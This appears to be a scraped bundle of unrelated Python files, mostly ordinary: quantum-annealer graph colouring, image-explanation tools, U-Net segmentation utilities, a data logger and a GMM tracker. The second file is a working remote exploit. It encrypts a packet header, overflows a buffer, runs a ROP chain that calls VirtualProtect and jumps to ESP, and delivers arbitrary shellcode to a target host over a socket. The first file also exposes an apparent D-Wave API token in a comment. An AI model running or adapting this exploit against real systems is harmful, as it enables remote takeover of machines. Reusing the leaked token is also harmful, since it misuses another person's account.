from itertools import combinations
from dwave.system.samplers import DWaveSampler
from dwave.system.composites import EmbeddingComposite
from matplotlib import pyplot as plt
import pandas as pd
def I(i, j, k):
"""This function converts double index to single index"""
return k*(i-1) + (j-1)
def make_and_solve(number_of_nodes, step=5, runs=5, token=''):
# nu = pd.read_csv('class1.csv', dtype=object) # Dataframe to export values in csv format
G = nx.Graph()
nodes = range(1, number_of_nodes + 1)
edges = list(combinations(nodes, 2))
# print("edges: ", edges)
G.add_nodes_from(nodes)
time_list = []
edge_no_list = []
response_list = [[] for i in range(runs)]
time_list_i = [[] for i in range(runs)]
for i in range(0, len(edges), step):
# print("i: ", i)
# print("slice: ", edges[i:i + step])
time_taken_list = []
for run in range(0,runs):
G.add_edges_from(edges[i:i + step])
n = number_of_nodes # n = number of nodes
k = n # k = no. of colors
# n = G.number_of_nodes() # n = number of nodes
# print("no. of nodes: ", n)
N = n * k # N = dimension of Q matrix
Q = [[0 for x in range(N)] for y in range(N)]
# Step 1: add -1 in the diagonal
for i in range(len(Q)):
Q[i][i] = -1
# Step 2: add 2 in blocks
for s in range(0, N, k):
for i in range(k):
for j in range(i + 1, k):
Q[s + i][s + j] = 2
# Step 3: add 1 with respect to the edges
edges_i = G.edges()
for edge in edges_i:
i, j = edge
# putting three 1s for every edge
Q[I(i, 1, k)][I(j, 1, k)] = 1
Q[I(i, 2, k)][I(j, 2, k)] = 1
Q[I(i, 3, k)][I(j, 3, k)] = 1
# print_Q()
# print("Q is: " + str(len(Q[0])) + " x " + str(len(Q[1])) + " dim ")
c = np.savetxt('Q_004.csv', Q, delimiter=', ')
# converting the Q matrix to a dictionary by only saving the non-zero values
Q_dict = {(row, col): val
for row, data in enumerate(Q)
for col, val in enumerate(data)
if val != 0}
# token = "DEV-08ef0bb0211afbf99b0563a2428ab5f95f200634"
endpoint = 'https://cloud.dwavesys.com/sapi'
# response = QBSolv().sample_qubo(Q_dict)
if token == '':
start = time.clock()
response = QBSolv.QBSolv().sample_qubo(Q_dict) # Classical
end = time.clock()
else:
start = time.clock()
# sampler = EmbeddingComposite(DWaveSampler(token=token, endpoint=endpoint))
# response = QBSolv.QBSolv().sample_qubo(Q_dict, solver=sampler) # QPU
response = EmbeddingComposite(DWaveSampler(token=token, endpoint=endpoint)).sample_qubo(Q_dict,
num_reads=1)
print("response power by ARCH uhuhu: ", response)
end = time.clock()
response_list[run].append(response)
time_taken_list.append(end - start)
time_list_i[run].append(end - start)
# create lists for easy viewing
big_list = []
# for i in response:
# big_list.append(list(i.values()))
# print(list(i.values()))
# print()
# print("number of edges: ", len(G.edges))
edge_no_list.append(len(G.edges))
mean_time = statistics.mean(time_taken_list)
# print("Time: ", mean_time)
# print()
time_list.append(mean_time)
# print("Hist_list: ", hist_list)
# plt.hist(hist_list, bins=range(len(hist_list)+1))
# plt.plot(range(len(time_list)), time_list)
df = pd.DataFrame({'No. of edges': edge_no_list,
'Time': time_list,
'Time1': time_list_i[0],
'Time2': time_list_i[1],
'response1': response_list[0],
'response2': response_list[1]})
df.to_csv('Output/GC' + str(number_of_nodes) + '.csv', index=False)
df.to_pickle('Output/GC' + str(number_of_nodes) + '.pkl')
# plt.show()
# just have to call this function multiple times
# make_and_solve(7, step=5, runs=2)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import struct
import sys
import time
def p16(addr, sign="unsigned"):
fmt = "<H"
if sign == "signed":
fmt = "<h"
return struct.pack(fmt, addr)
def p32(addr, sign="unsigned"):
fmt = "<I"
if sign == "signed":
fmt = "<i"
return struct.pack(fmt, addr)
def info(msg):
print "[*]{}".format(msg)
def success(msg):
print "[+]{}".format(msg)
def error(msg):
print "[!]{}".format(msg)
exit(1)
def encrypt(key, data):
ret = ""
key0 = key1 = key2 = key3 = key
for ch in data:
key0 = (key0 + (((key0 >> 3) & 0xffffffff) - 0x11111111) & 0xffffffff) & 0xffffffff
key1 = (key1 + (((key1 >> 5) & 0xffffffff) - 0x22222222) & 0xffffffff) & 0xffffffff
key2 = (key2 + (0x44444444 - ((key2 << 9) & 0xffffffff)) & 0xffffffff) & 0xffffffff
key3 = (key3 + (0x33333333 - ((key3 << 7) & 0xffffffff)) & 0xffffffff) & 0xffffffff
new_key = (((key2 & 0xff) + (key3 & 0xff) + (key1 & 0xff) + (key0 & 0xff)) & 0xff)
res = struct.unpack("<B", ch)[0] ^ new_key
ret += struct.pack("<B", res)
return ret
def exploit(host, port, shellcode):
padding_length = 0xf008
call_ebp = 0x004045c4
key = 0xdeadbeef
rop_chain = ""
rop_chain += p32(0x004fc251) # POP EAX # RETN
rop_chain += p32(0x0056D39C) # &VirtualProtect()
rop_chain += p32(0x00403b23) # MOV EAX, [EAX] # RETN
rop_chain += p32(0x004d1096) # XCHG EAX,ESI # RETN
rop_chain += p32(0x0048dfe6) # POP EBP # RETN
rop_chain += p32(0x0043c3d7) # & jmp esp
rop_chain += p32(0x004efad5) # POP EBX # RETN
rop_chain += p32(0x00000400) # ebx
rop_chain += p32(0x004b2798) # POP EDX # RETN
rop_chain += p32(0x00000040) # edx
rop_chain += p32(0x00405aa7) # POP ECX # RETN 0x08
rop_chain += p32(0x00571cfd) # &Writable location
rop_chain += p32(0x00403159) # POP EDI # RETN
rop_chain += p32(0x41414141) # padding
rop_chain += p32(0x41414141) # padding
rop_chain += p32(0x0047d25f) # RETN (ROP NOP)
rop_chain += p32(0x004fc251) # POP EAX # RETN
rop_chain += p32(0x90909090) # nop
rop_chain += p32(0x0054021f) # PUSHAD # RETN
pktlen = padding_length + len(rop_chain) + len(shellcode)
hdr = encrypt(key, p32(key) + p32(0) + p16(pktlen) + p16(pktlen) + p32(0))
pkt = p32(key) + hdr[4:] + "A" * padding_length + rop_chain + shellcode
sd = socket.socket()
try:
info("try to connect to {}:{}".format(host, port))
sd.connect((host, port))
info("sending paylaod...")
sd.send(pkt)
time.sleep(0.5)
success("done")
sd.close()
except Exception as ex:
print error(ex)
if __name__ == "__main__":
if len(sys.argv) != 4:
error("Usage: {} 127.0.0.1 13579 shellcode.bin".format(sys.argv[0]))
try:
with open(sys.argv[3], "rb") as fd:
host, port = sys.argv[1], int(sys.argv[2])
shellcode = fd.read()
exploit(host, port, shellcode)
except Exception as ex:
error(ex)
|
from visual import *
from particula import *
def generaColumna(posInicial, masa, nParticulasX, nParticulasY, nParticulasZ, densidad, separacion, vInicial, radio, color):
listaParticulas= []
#Calculamos la nueva posicion de la particula separada
for k in range(nParticulasZ):
#print k
newZ= k*separacion
#print newZ
for j in range(nParticulasY):
newY= j*separacion
for i in range(nParticulasX):
newX= i*separacion
newPos= vector(newX, newY, newZ)
posicion= posInicial + newPos
#print posicion
#Con los datos calculados genramos la nueva particula
particula= Particula(posicion, masa, densidad, vInicial, radio, color)
#Y la anadimos a nuetsra lista
listaParticulas.append(particula)
return listaParticulas
#Otros metodos de generacion de particulas
def generaLineaParticulas(listaParticulas, posInicial, masa, densidad, numParticulas, coordenada, separacion, vInicial, radio, color):
if coordenada == 'x':
vectorIterador = vector(separacion,0.0,0.0)
elif coordenada == 'y':
vectorIterador = vector(0.0,separacion,0.0)
else:
vectorIterador = vector(0.0,separacion,0.0)
for i in range(numParticulas):
posicion = posInicial + i*vectorIterador
particula = Particula(posicion, masa, densidad, vInicial, radio, color)
listaParticulas.append(particula)
return listaParticulas
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import numpy as np
import torch
from PIL import Image
from skimage.segmentation import mark_boundaries
from skimage.color import rgb2gray
from ex_methods.lime import lime_image
from ex_methods.module.load_model import load_model
from ex_methods.module.utils import grad_visualize, lrp_visualize, load_image, target_layer, preprocess_transform
def get_class_list(dataset):
if dataset == 'Imagenet':
with open(os.path.abspath('./data/imagenet_class_index.json'), 'r') as read_file:
class_idx = json.load(read_file)
idx2label = [class_idx[str(k)][1] for k in range(len(class_idx))]
return idx2label
elif dataset == 'mnist':
return ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
elif dataset == 'cifar10':
return ["airplane", "automobile", "bird", "cat", "deer", "dog", "frog", "horse", "ship", "truck"]
else:
return "暂不支持其他数据集"
def get_target_num(dataset):
if dataset == "Imagenet":
return 1000
else:
return 10
def predict(img, model, device, dataset):
net = load_model(model, pretrained=True, pretrained_path=None)
net = net.eval().to(device)
x = load_image(device, img, dataset)
activation_output = net.forward(x)
_, prediction = torch.max(activation_output, 1)
print(prediction)
return prediction, x, activation_output, net
def draw_grad(prediction, x, activation_output, net, dataset, model, device):
result_lrp = net.interpretation(activation_output,
interpreter="lrp",
labels=prediction,
num_target=get_target_num(dataset),
device=device,
target_layer=target_layer(model),
inputs=x)
result_cam = net.interpretation(activation_output,
interpreter="grad_cam",
labels=prediction,
num_target=get_target_num(dataset),
device=device,
target_layer=target_layer(model),
inputs=x)
x = x.permute(0, 2, 3, 1).cpu().detach().numpy()
x = x - x.min(axis=(1, 2, 3), keepdims=True)
x = x / x.max(axis=(1, 2, 3), keepdims=True)
img_l = lrp_visualize(result_lrp, 0.9)[0]
img_h = grad_visualize(result_cam, x)[0]
img_l = Image.fromarray((img_l * 255).astype(np.uint8))
img_h = Image.fromarray((img_h * 255).astype(np.uint8))
return img_l, img_h
def batch_predict(images, model, device, dataset):
"""
lime 中对随机取样图像进行预测
:param images: np.array
:param model:
:param device:
:return:
"""
if dataset == "mnist":
images = rgb2gray(images)
batch = torch.stack(tuple(preprocess_transform(i, dataset) for i in images), dim=0)
batch = batch.to(device).type(dtype=torch.float32)
probs = model.forward(batch)
return probs.detach().cpu().numpy()
def draw_lime(img, net, device, dataset):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(np.array(img),
net,
device,
dataset,
batch_predict, # classification function
top_labels=5,
hide_color=0,
num_samples=1000) # number of images that will be sent to classification function
temp, mask = explanation.get_image_and_mask(explanation.top_labels[0], positive_only=False, negative_only=False,
num_features=5, hide_rest=False)
img_boundry = mark_boundaries(temp / 255.0, mask)
img_boundry = Image.fromarray((img_boundry * 255).astype(np.uint8))
return img_boundry
def get_explain(nor_img, adv_img, model, dataset):
device = torch.device("cuda:0")
class_list = get_class_list(dataset)
nor_image = Image.open(nor_img).convert('RGB')
adv_image = Image.open(adv_img).convert('RGB')
if dataset == "mnist":
nor_image = nor_image.convert("L")
adv_image = adv_image.convert("L")
imgs = [nor_image, adv_image]
class_names = []
ex_imgs = []
for img in imgs:
prediction, x, activation_output, net = predict(img, model, device, dataset)
class_name = class_list[prediction.item()]
img_l, img_h = draw_grad(prediction, x, activation_output, net, dataset, model, device)
img_lime = draw_lime(img, net, device, dataset)
class_names.append(class_name)
ex_imgs.append([img_l, img_h, img_lime])
return class_names, ex_imgs
|
# -*- coding: utf-8 -*-
"""
brickv (Brick Viewer)
Copyright (C) 2012, 2014 Roland Dudko <roland.dudko@gmail.com>
Copyright (C) 2012, 2014 Marvin Lutz <marvin.lutz.mail@gmail.com>
main.py: Main standalone data logger
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
# MAIN DATA_LOGGER PROGRAM
import argparse # command line argument parser
import os
import signal
import sys
import traceback
import logging
from brickv.data_logger.data_logger import DataLogger
from brickv.data_logger.event_logger import ConsoleLogger, FileLogger, EventLogger
from brickv.data_logger.utils import DataLoggerException
from brickv.data_logger.configuration import load_and_validate_config
if hasattr(sys, "frozen"):
program_path = os.path.dirname(os.path.realpath(unicode(sys.executable, sys.getfilesystemencoding())))
if sys.platform == "darwin":
resources_path = os.path.join(os.path.split(program_path)[0], 'Resources')
else:
resources_path = program_path
else:
program_path = os.path.dirname(os.path.realpath(unicode(__file__, sys.getfilesystemencoding())))
resources_path = program_path
# add program_path so OpenGL is properly imported
sys.path.insert(0, program_path)
# Allow brickv to be directly started by calling "main.py"
# without "brickv" being in the path already
if 'brickv' not in sys.modules:
head, tail = os.path.split(program_path)
if head not in sys.path:
sys.path.insert(0, head)
if not hasattr(sys, "frozen"):
# load and inject in modules list, this allows to have the source in a
# directory named differently than 'brickv'
sys.modules['brickv'] = __import__(tail, globals(), locals(), [], -1)
CLOSE = False
def __exit_condition(data_logger):
"""
Waits for an 'exit' or 'quit' to stop logging and close the program
"""
try:
while True:
raw_input("") # FIXME: is raw_input the right approach
if CLOSE:
raise KeyboardInterrupt()
except (KeyboardInterrupt, EOFError):
sys.stdin.close()
data_logger.stop()
def signal_handler(signum, frame):
"""
This function handles the ctrl + c exit condition
if it's raised through the console
"""
global CLOSE
CLOSE = True
def log_level_name_to_id(log_level):
if log_level == 'debug':
return logging.DEBUG
elif log_level == 'info':
return logging.INFO
elif log_level == 'warning':
return logging.WARNING
elif log_level == 'error':
return logging.ERROR
elif log_level == 'critical':
return logging.CRITICAL
else:
return logging.INFO
def main(config_filename, gui_config, gui_job):
"""
This function initialize the data logger and starts the logging process
"""
config = None
gui_start = False
if config_filename != None: # started via console
config = load_and_validate_config(config_filename)
if config == None:
return None
else: # started via GUI
config = gui_config
gui_start = True
if config['debug']['log']['enabled']:
EventLogger.add_logger(FileLogger('FileLogger', log_level_name_to_id(config['debug']['log']['level']),
config['debug']['log']['file_name']))
data_logger = None
try:
data_logger = DataLogger(config, gui_job)
if data_logger.ipcon is not None:
data_logger.run()
if not gui_start:
__exit_condition(data_logger)
else:
raise DataLoggerException(DataLoggerException.DL_CRITICAL_ERROR,
"DataLogger did not start logging process! Please check for errors.")
except Exception as exc:
EventLogger.critical(str(exc))
if gui_start:
return None
else:
sys.exit(DataLoggerException.DL_CRITICAL_ERROR)
return data_logger
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Tinkerforge Data Logger')
parser.add_argument('config', help='config file location')
parser.add_argument('--log-level', choices=['none', 'debug', 'info', 'warning', 'error', 'critical'],
default='info', help='console logger log level')
args = parser.parse_args(sys.argv[1:])
if args.log_level != 'none':
EventLogger.add_logger(ConsoleLogger('ConsoleLogger', log_level_name_to_id(args.log_level)))
signal.signal(signal.SIGINT, signal_handler)
main(args.config, None, None)
|
from __future__ import print_function
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import numpy as np
import os
import glob
import skimage.io as io
import skimage.transform as trans
import tensorflow as tf
from skimage import img_as_ubyte
import matplotlib.pyplot as plt
import tensorflow.keras as keras
import keras.backend as K
import cv2
Sky = [128, 128, 128]
Building = [128, 0, 0]
Pole = [192, 192, 128]
Road = [128, 64, 128]
Pavement = [60, 40, 222]
Tree = [128, 128, 0]
SignSymbol = [192, 128, 128]
Fence = [64, 64, 128]
Car = [64, 0, 128]
Pedestrian = [64, 64, 0]
Bicyclist = [0, 128, 192]
Unlabelled = [0, 0, 0]
COLOR_DICT = np.array([Sky, Building, Pole, Road, Pavement,
Tree, SignSymbol, Fence, Car, Pedestrian, Bicyclist, Unlabelled])
def set_GPU_Memory_Limit():
""" Set the GPU memory limit for the program when using Tensorflow GPU """
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
except RuntimeError as e:
print(e)
def Unet_scheduler(epoch, lr):
"""
learning rate decay
"""
if epoch < 2:
return lr
elif epoch < 5:
return 1e-4
elif epoch < 10:
return 1e-4
else:
return lr * tf.math.exp(-0.05)
def adjustData(img, mask, flag_multi_class, num_class):
"""
Rescale image and turn the mask to one hot vector
"""
if flag_multi_class:
img = img / 255
mask = mask[:, :, :, 0] if (len(mask.shape) == 4) else mask[:, :, 0] # [batch_size,w,h,channel]
new_mask = np.zeros(mask.shape + (num_class,)) # add one dimension for num_class size
for i in range(num_class):
# for one pixel in the image, find the class in mask and convert it into one-hot vector
# index = np.where(mask == i)
# index_mask = (index[0],index[1],index[2],np.zeros(len(index[0]),dtype = np.int64) + i) if (len(mask.shape) == 4) else (index[0],index[1],np.zeros(len(index[0]),dtype = np.int64) + i)
# new_mask[index_mask] = 1
new_mask[mask == i, i] = 1
new_mask = np.reshape(new_mask, (new_mask.shape[0], new_mask.shape[1] * new_mask.shape[2],
new_mask.shape[3])) if flag_multi_class else np.reshape(new_mask, (
new_mask.shape[0] * new_mask.shape[1], new_mask.shape[2]))
mask = new_mask
else:
img = img / 255 # can be replace by setting rescale parameter in ImageDataGenerator
mask = mask / 255
mask[mask > 0.5] = 1
mask[mask <= 0.5] = 0
return img, mask
def trainGenerator(batch_size, train_path, image_folder, mask_folder, aug_dict, image_color_mode="grayscale",
mask_color_mode="grayscale", image_save_prefix="image", mask_save_prefix="mask",
flag_multi_class=False, num_class=2, save_to_dir=None, target_size=(256, 256), seed=1):
"""
can generate image and mask at the same time
use the same seed for image_datagen and mask_datagen to ensure the transformation for image and mask is the same
if you want to visualize the results of generator, set save_to_dir = "your path"
"""
if save_to_dir and not os.path.exists(save_to_dir):
os.mkdir(save_to_dir)
image_datagen = ImageDataGenerator(**aug_dict)
mask_datagen = ImageDataGenerator(**aug_dict)
image_generator = image_datagen.flow_from_directory(
train_path,
classes=[image_folder],
class_mode=None,
color_mode=image_color_mode,
target_size=target_size,
batch_size=batch_size,
save_to_dir=save_to_dir,
save_prefix=image_save_prefix,
seed=seed)
mask_generator = mask_datagen.flow_from_directory(
train_path,
classes=[mask_folder],
class_mode=None,
color_mode=mask_color_mode,
target_size=target_size,
batch_size=batch_size,
save_to_dir=save_to_dir,
save_prefix=mask_save_prefix,
seed=seed)
train_generator = zip(image_generator, mask_generator)
for (img, mask) in train_generator:
img, mask = adjustData(img, mask, flag_multi_class, num_class)
yield img, mask
def testGenerator(test_path, num_image=30, target_size=(256, 256), flag_multi_class=False, as_gray=True):
"""Test generator, generate image for testing """
assert len(glob.glob(os.path.join(test_path,"*.png"))) <= num_image, "num_image need to be smaller than test image in current test_path"
for i in range(num_image):
img = io.imread(os.path.join(test_path, "%d.png" % i), as_gray=as_gray)
img = img / 255
img = trans.resize(img, target_size)
img = np.reshape(img, img.shape + (1,)) if (not flag_multi_class) else img
img = np.reshape(img, (1,) + img.shape)
yield img
def geneTrainNpy(image_path, mask_path, flag_multi_class=False, num_class=2, image_prefix="image", mask_prefix="mask",
image_as_gray=True, mask_as_gray=True):
image_name_arr = glob.glob(os.path.join(image_path, "%s*.png" % image_prefix))
image_arr = []
mask_arr = []
for index, item in enumerate(image_name_arr):
img = io.imread(item, as_gray=image_as_gray)
img = np.reshape(img, img.shape + (1,)) if image_as_gray else img
mask = io.imread(item.replace(image_path, mask_path).replace(image_prefix, mask_prefix), as_gray=mask_as_gray)
mask = np.reshape(mask, mask.shape + (1,)) if mask_as_gray else mask
img, mask = adjustData(img, mask, flag_multi_class, num_class)
image_arr.append(img)
mask_arr.append(mask)
image_arr = np.array(image_arr)
mask_arr = np.array(mask_arr)
return image_arr, mask_arr
def labelVisualize(num_class, color_dict, img):
"""
visualize the label image
"""
img = img[:, :, 0] if len(img.shape) == 3 else img
img_out = np.zeros(img.shape + (3,))
for i in range(num_class):
img_out[img == i, :] = color_dict[i]
return img_out / 255
def saveResult(save_path, npyfile, flag_multi_class=False, num_class=2):
"""
save the visualized result
"""
if not os.path.exists(save_path):
os.mkdir(save_path)
for i, item in enumerate(npyfile):
img = labelVisualize(num_class, COLOR_DICT, item) if flag_multi_class else item[:, :, 0]
io.imsave(os.path.join(save_path, "%d_predict.png" % i), img_as_ubyte(img))
def visualize_training_results(hist, save_path="../results/UNet/Unet_training", loss_flag=True, acc_flag=True,lr_flag=False):
"""
visualize the loss function/acc/lr during the training process
"""
print("Training history has key:")
for key in hist.history:
print(key)
loss = hist.history['loss']
acc = hist.history['accuracy']
lr = hist.history['lr']
if loss_flag:
plt.plot(np.arange(len(loss)), loss)
plt.scatter(np.arange(len(loss)), loss, c='g')
plt.xlabel("Epoch")
plt.ylabel("Loss")
plt.title("Training loss")
plt.savefig(os.path.join(save_path, "loss.png"))
plt.show()
if acc_flag:
plt.plot(np.arange(len(acc)), acc)
plt.scatter(np.arange(len(acc)), acc, c='g')
plt.xlabel("Epoch")
plt.ylabel("Accuracy")
plt.title("Training accuracy")
plt.savefig(os.path.join(save_path, "acc.png"))
plt.show()
if lr_flag:
plt.plot(np.arange(len(lr)), lr)
plt.scatter(np.arange(len(lr)), lr, c='g')
plt.xlabel("Epoch")
plt.ylabel("Learning rate")
plt.title("Training learning rate decay")
plt.savefig(os.path.join(save_path, "lr.png"))
plt.show()
def bce_dice_loss(y_true, y_pred):
"""
Training loss: BinaryCrossEntropy
"""
return 0.5 * keras.losses.binary_crossentropy(y_true, y_pred) - dice_coef(y_true, y_pred)
def dice_coef(y_true, y_pred):
"""
Training loss: dice loss.
Dice coefficient: 2* overlapped area space / total space
"""
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
def dice_coef_loss(y_true, y_pred):
return 1. - dice_coef(y_true, y_pred)
def compute_dice(im1, im2, empty_score=1.0):
"""
Evaluation metric: Dice
"""
im1 = np.asarray(im1 > 0.5).astype(np.bool)
im2 = np.asarray(im2 > 0.5).astype(np.bool)
if im1.shape != im2.shape:
raise ValueError("Shape mismatch: im1 and im2 must have the same shape.")
im_sum = im1.sum() + im2.sum()
if im_sum == 0:
return empty_score
intersection = np.logical_and(im1, im2)
return 2. * intersection.sum() / im_sum
def compute_metrics(y_true, y_pred):
"""
metrics of V_rand and V_info
"""
v_rand,v_info=None,None
pred_label = (y_pred > 0.5).astype(np.uint8)
gt_label = (y_true > 0.5).astype(np.uint8)
pred_num, pred_out = cv2.connectedComponents(pred_label, connectivity=4)
gt_num, gt_out = cv2.connectedComponents(gt_label, connectivity=4)
p = np.zeros((pred_num+1, gt_num+1))
for i in range(pred_num+1):
tmp_mask = (pred_out==i)
for j in range(gt_num+1):
if i==0 or j==0:
p[i][j]=0
else:
p[i][j] = np.logical_and(tmp_mask, gt_out==j).sum()
#normalize
tot_sum = p.sum()
p = p / tot_sum
#marginal distribution
s = p.sum(axis=0)
t = p.sum(axis=1)
#entropy
sum_p_log = (p * np.log(p+1e-9)).sum()
sum_s_log = (s * np.log(s+1e-9)).sum()
sum_t_log = (t * np.log(t+1e-9)).sum()
v_info = -2 * (sum_p_log - sum_s_log - sum_t_log) / (sum_s_log + sum_t_log)
sum_p_s = (p*p).sum()
sum_s_s = (s*s).sum()
sum_t_s = (t*t).sum()
v_rand = 2 * sum_p_s / (sum_t_s + sum_s_s)
return v_rand,v_info
def groundTruthLabelGenerator(label_path, num_label=30, target_size=(256, 256), flag_multi_class=False, as_gray=True):
"""Label generator, generate ground truth label for evaluation/test """
assert len(glob.glob(os.path.join(label_path,
"*.png"))) >= num_label, "num_label need to be smaller than test label in current label_path"
masks = []
for i in range(num_label):
mask = io.imread(os.path.join(label_path, "%d.png" % i), as_gray=as_gray)
mask = mask / 255
mask[mask > 0.5] = 1
mask[mask <= 0.5] = 0
mask = trans.resize(mask, target_size)
mask = np.reshape(mask, mask.shape + (1,)) if (not flag_multi_class) else mask
masks.append(mask)
return masks
def predictLabelGenerator(label_path, num_label=30, target_size=(256, 256), flag_multi_class=False, as_gray=True):
"""Label generator, generate predicted label for evaluation/test """
assert len(glob.glob(os.path.join(label_path,"*.png"))) >= num_label, "num_label need to be smaller than test label in current label_path"
masks = []
for i in range(num_label):
mask = io.imread(os.path.join(label_path, "%d_predict.png" % i), as_gray=as_gray)
mask = mask / 255 # note: we can't use the threshold method as in groundTruthLabelGenerator()
mask = trans.resize(mask, target_size)
mask = np.reshape(mask, mask.shape + (1,)) if (not flag_multi_class) else mask
masks.append(mask)
return masks
|
# -*- coding: utf-8 -*-
import numpy as np
from sklearn import cluster
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import pyqtSignal, pyqtSlot
try:
from .ui_group_tracker_widget import Ui_group_tracker_widget
except ImportError:
from ui_group_tracker_widget import Ui_group_tracker_widget
try:
from .group_tracker import GroupTrackerGMM
except ImportError:
from group_tracker import GroupTrackerGMM
class Widget(Ui_group_tracker_widget, QtWidgets.QWidget):
reset = pyqtSignal()
restart = pyqtSignal()
def __init__(self, parent):
super(Widget, self).__init__(parent)
self.setupUi()
self.estimator_init()
def setupUi(self):
super(Widget, self).setupUi(self)
self.resetButton.pressed.connect(self.reset_button_pressed)
self.restartButton.pressed.connect(self.restart_button_pressed)
self.nObjectsSpinBox.valueChanged.connect(
self.n_objects_spinbox_value_changed
)
self.likelihoodDiffThresholdSpinBox.valueChanged.connect(
self.likelihoodDiffThresholdSpinBoxValueChanged
)
def likelihoodDiffThresholdSpinBoxValueChanged(self, val):
if self.gmm is not None:
self.gmm.set_likelihood_diff_threshold(val)
def estimator_init(self):
self.gmm = None
def reset_estimator(self, kv):
if self.gmm is not None:
if np.all(np.isnan(kv['position'])):
self.gmm = None
else:
self.gmm.means_[:] = kv['position']
self.gmm.params = 'wc'
def get_name(self):
return 'Group Tracker GMM'
def is_filter_required(self):
return True
def get_tracking_n(self):
return self.nObjectsSpinBox.value()
def get_attributes(self):
return {'position': ('x', 'y')}
def track(self, original_img, filtered_img, prev_data):
n_objects = self.nObjectsSpinBox.value()
n_k_means = self.nKmeansSpinBox.value()
non_zero_pos = np.transpose(np.nonzero(filtered_img.T))
# FIXME: 真っ黒な画像が入力されたときのためアドホックに対処.
if self.gmm is None:
gmm = GroupTrackerGMM(
n_components=n_objects,
covariance_type='full',
n_iter=1000,
init_params='wc',
params='wc'
)
gmm.set_likelihood_diff_threshold(
self.likelihoodDiffThresholdSpinBox.value()
)
else:
gmm = self.gmm
try:
gmm._fit(non_zero_pos, n_k_means=n_k_means)
self.gmm = gmm
res = self.gmm.means_
except Exception as e:
if self.gmm is None:
res = np.full((n_objects, 2), np.nan)
else:
if prev_data['ignore_error']:
res = prev_data['position']
else:
raise RuntimeError(
'{}\n'
'Please check "Ignore mis-detection error" on '
'if you want to ignore tracking errors.'.format(e)
)
return {'position': res}
@pyqtSlot()
def reset_button_pressed(self):
self.estimator_init()
self.reset.emit()
@pyqtSlot()
def restart_button_pressed(self):
self.restart.emit()
@pyqtSlot(int)
def n_objects_spinbox_value_changed(self, i):
self.nKmeansSpinBox.setMinimum(i)
|
###################################################
import tensorflow as tf
a = [[1,2,3],[4,5,6]]
b = [[1,0,3],[1,5,1]]
condition1 = [[True,False,False],
[False,True,True]]
condition2 = [[True,False,False],
[False,True,False]]
with tf.Session() as sess:
print(sess.run(tf.where(condition1)))
print(sess.run(tf.where(condition2)))
x = [[1,2,3],[4,5,6]]
y = [[7,8,9],[10,11,12]]
condition3 = [[True,False,False],
[False,True,True]]
condition4 = [[True,False,False],
[True,True,False]]
with tf.Session() as sess:
print(sess.run(tf.where(condition3,x,y)))
print(sess.run(tf.where(condition4,x,y)))
global_step = tf.train.get_global_step()
print(global_step)
###################################################################################
|
import math
import cv2
import numpy as np
def max_dist(x_k, y_k, x, y):
return math.sqrt((x - x_k) ** 2 + (y - y_k) ** 2)
def seek_chair_contours(rect_dict, x, y, w, h):
x_max, y_max = 0, 0
max_len = 0
for x_k, y_k in rect_dict.keys():
curr_max = max_dist(x_k, y_k, x + w / 2, y + h / 2)
if curr_max >= max_len:
max_len = curr_max
x_max = x_k
y_max = y_k
min_contour = rect_dict[(x_max, y_max)]
return min_contour, x_max, y_max
def seek_night_stand_conours(rect_dict, x_max, y_max):
night_stand_1 = (0, 0)
night_stand_2 = (0, 0)
for x_k, y_k in rect_dict.keys():
if (x_k, y_k) != (x_max, y_max) and night_stand_1 == (0, 0):
night_stand_1 = (x_k, y_k)
elif (x_k, y_k) != (x_max, y_max) and night_stand_2 == (0, 0):
night_stand_2 = (x_k, y_k)
if night_stand_1[0] < night_stand_2[0]:
night_stand_left = night_stand_1
night_stand_right = night_stand_2
else:
night_stand_left = night_stand_2
night_stand_right = night_stand_1
return rect_dict[night_stand_left], rect_dict[night_stand_right], night_stand_left
def seek_w_chair(chair_contour):
rect = cv2.minAreaRect(chair_contour)
box = cv2.boxPoints(rect)
box = np.int0(box)
x, y, z, d = box
x_coords = [x[0], y[0], z[0], d[0]]
y_coords = [x[1], y[1], z[1], d[1]]
chair_lengths = []
for i in range(4):
for j in range(4):
if i != j:
chair_lengths.append(max_dist(x_coords[i], y_coords[i], x_coords[j], y_coords[j]))
chair_lengths = set(chair_lengths)
chair_lengths = sorted(list(chair_lengths))
return chair_lengths[0] |
#!/usr/bin/env python
import numpy as np
import sys
from scipy import stats
# I used the lee.cor and similarities0-1.txt files from https://github.com/piskvorky/gensim/tree/develop/gensim/test/test_data
sim_matrix_original = np.loadtxt("similarities0-1.txt")
gesa_matrix = np.loadtxt(str(sys.argv[1]))
sim_matrix_original_list = []
sim_matrix_list = []
sim_matrix_original_list = []
sim_matrix_list = []
for i in range(50):
for j in range(50):
if(i <= j):
sim_matrix_original_list.append(sim_matrix_original[i][j])
sim_matrix_list.append( pow(gesa_matrix[i][j], 1) )
print "Pearson's linear correlation coefficient:", stats.pearsonr(sim_matrix_original_list, sim_matrix_list)
print "Spearman rank-order correlation coefficient:", stats.spearmanr(sim_matrix_original_list, sim_matrix_list)
|
#!/usr/bin/env python
'''
Author : Yi-Ying Lin
'''
from __future__ import print_function
import rospy
import numpy as np
import math
from math import pi
import time
from geometry_msgs.msg import Twist, Point, Pose
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Imu
from nav_msgs.msg import Odometry
